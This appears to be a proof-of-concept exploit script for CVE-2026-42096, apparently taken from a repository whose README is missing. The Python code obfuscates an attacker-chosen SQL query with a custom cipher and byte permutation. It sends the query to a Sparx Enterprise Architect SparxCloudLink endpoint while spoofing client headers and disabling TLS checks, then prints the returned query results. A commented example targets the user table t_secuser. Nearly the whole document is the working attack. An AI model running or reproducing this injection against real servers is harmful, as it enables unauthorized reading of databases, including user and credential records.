README.md
README.md not found for CVE-2026-42096. The file may not exist in the repository.
import sys
import requests
import urllib3
import pycurl
from io import BytesIO
import zipfile
k="HERE_SHOULD_BE_THE_KEY"
x=[4, 2, 0, 6, 3, 1, 5]
xr=[x.index(i) for i in range(7)]
def mangle(s:str) -> str:
o=bytearray(s,"utf-8")
for i in range((len(s) // 7)*7):
o[i]=ord(s[((i // 7)*7)+xr[i % 7]])
return o.decode("utf-8")
def demangle(s:str) -> str:
o=bytearray(s,"utf-8")
for i in range((len(s) // 7)*7):
o[i]=ord(s[((i // 7)*7)+x[i % 7]])
return o.decode("utf-8")
def custom_decode(ciphertext: str, key: str) -> str:
"""
Decode using the custom cipher.
ciphertext : input string (Unicode)
key : key string (Unicode)
Returns plaintext string (printable ASCII 0x20–0x7E).
"""
output_chars = []
length = len(ciphertext)
key_len = len(key)
for i, ch in enumerate(ciphertext):
# load plaintext character as integer
c_val = ord(ch)
# derive key value (word from key string)
k_val = ord(key[(i+length) % key_len])
c_val = c_val - 0x20 - k_val + 0x40
if c_val<0x20:
c_val=c_val+0x5E
if c_val>(0x5E+0x20):
c_val=c_val-0x5E
output_chars.append(chr(c_val))
return "".join(output_chars)
def custom_encode(plaintext: str, key: str) -> str:
"""
Encode plaintext using the custom cipher.
plaintext : input string (Unicode)
key : key string (Unicode)
Returns encoded string (printable ASCII 0x20–0x7E).
"""
output_chars = []
length = len(plaintext)
key_len = len(key)
for i, ch in enumerate(plaintext):
# load plaintext character as integer
c_val = ord(ch)
# subtract 0x40
c_val = c_val - 0x40
# derive key value (word from key string)
k_val = ord(key[(i+length) % key_len])
# add key
total = k_val + c_val
# modulo 94
total = total % 0x5E
# add 0x20 (ensures printable ASCII)
encoded_val = total + 0x20
# append encoded character
output_chars.append(chr(encoded_val))
return "".join(output_chars)
def test(debug_type, debug_msg):
print("debug(%d): %s" % (debug_type, debug_msg))
if __name__ == "__main__":
if (len(sys.argv)!=4):
print("Usage: "+sys.argv[0]+" URL_without_sparxcloudlink_path model_name sql")
exit(-1)
host = sys.argv[1]
repo = sys.argv[2]
sqli = sys.argv[3]
#url = "%s/SparxCloudLink.sseap?model=%s"%(host,repo)
url = "%s/SparxCloudLink.sseap"%(host)
print(url)
sqli = str(len(sqli))+":"+sqli
fill="+d1XL|@"
sqli += fill[-(7-(len(sqli)%7)):]
print (sqli)
#sqli="23:Select * from t_secuser|@"
ret=custom_encode(mangle(sqli),k)
binary=bytes([0,0,0,1,0,0])
binary+=bytes.fromhex('%04X'%(len(ret)*2+66))
binary+=bytes.fromhex('%04X'%(len(repo)))
for c in repo:
binary+=bytes([ord(c),0])
binary+=bytes([0,1,0,0])
binary+=bytes.fromhex('%04X'%(len(ret)))
for c in ret:
binary+=bytes([ord(c),0])
c=pycurl.Curl()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.READDATA, BytesIO(binary))
c.setopt(pycurl.POSTFIELDSIZE, len(binary))
c.setopt(pycurl.POST, 1)
c.setopt(pycurl.VERBOSE, 1)
c.setopt(pycurl.DEBUGFUNCTION, test)
c.setopt(pycurl.HTTPHEADER, ['Content-Type: ' , 'Accept: ', 'EnterpriseArchitect-Build: 1527' , 'EnterpriseArchitect-InternalBuild: 481' , 'User-Agent: Enterprise Architect/15.1.1527' , 'Connection: Keep-Alive' , 'Cache-Control: no-cache'])
body = BytesIO()
c.setopt(pycurl.WRITEDATA, body)
c.setopt(pycurl.SSL_VERIFYPEER, 0)
c.setopt(pycurl.SSL_VERIFYHOST, 0)
c.perform()
c.close()
try:
z = zipfile.ZipFile(body)
print(z.read('query.xml').decode('utf-8'))
except zipfile.BadZipFile:
sys.stdout.buffer.write(body.getvalue())